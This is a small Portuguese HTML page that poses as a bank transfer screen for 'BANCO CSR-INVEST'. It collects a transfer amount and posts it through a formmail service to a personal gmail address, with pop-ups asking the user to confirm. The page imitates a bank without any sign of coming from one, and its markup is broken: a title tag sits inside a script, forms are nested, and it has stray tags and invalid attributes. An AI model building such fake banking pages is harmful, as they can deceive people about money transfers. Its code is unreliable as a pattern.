<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//PT-BR">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<script src="https://kit.fontawesome.com/a076d05399.js" crossorigin="anonymous"></script> 
</head>
<script>
alert("OBRIGADA PELA PREFERÊNCIA ^.^")
<title>TRANSFERÊNCIA</title>
</script>

<body>
<form action="http://formmail.kinghost.net/formmail.cgi" method="POST"> <img src="#" width="100%" height="100px"alt="#">
 
<div>
<p class="nome"> <b>ERICA MACIEL  </p>
<p class="n_banco">BANCO CSR-INVEST</p>
<p></p>
<label class="lab_valor">VALOR</label><br>
</style>

</select>
<form action="http://formmail.kinghost.net/formmail.cgi" method="POST">  
 <input type="hidden" name="recipient" value="scvariedades1980@gmail.com">  
 

 
 
 <input type="hidden" name="subject" value="Assunto" <input type="hidden" name="email" value="gmail.com">


  <td><input cracked type="hidden"  name="BANCO" value="CSR-INVEST ">

 
  <td><input cracked type="hidden"  name="C/C 5655" value="ERICA MACIEL">


<input class="inp_valor"type="text" size="18" name="VALOR" value=""required placeholder="VALOR">
  
 <br><br>


 <input class="btn"type="submit" name="" value="ENVIAR" onclick="funcao1()" value="Exibir Alert" >




</div>



<textarea  class="txtarea" readonly >
-------------------------------------
EXTRATO DE TRANSACAO BANCO CSR-INVEST
-------------------------------------
</textarea>

<style>
body {
    background:brown;
    color:white;
}
.inp_valor {
    margin-left:%;
    text-align:center;
    width:50%;
    border-radius:100px;
    outline:none
}
.lab_valor {
    margin-left:35%;
}
.nome {
    margin-left:15%;
}
.n_banco {
    margin-left:25%;
    justify-content:center;
}
.btn {
    width:20%;
    height:23px;
     border-radius:100px;
     outline:none;
     margin-left:35%;
     
}
.txtarea {
    width:100%;
    height:200px;
    text-align:center;
    background:black;
    color:white;
}
</style>
<script>
function funcao1()
{
alert("OBRIGADA PELA PREFERÊNCIA.\n\nCONFIRME\n__________________________\nEM ENVIAR ASSIM MESMO\n-----------------------------------------");
}
</script>
</form>
</body> 
</html>
 
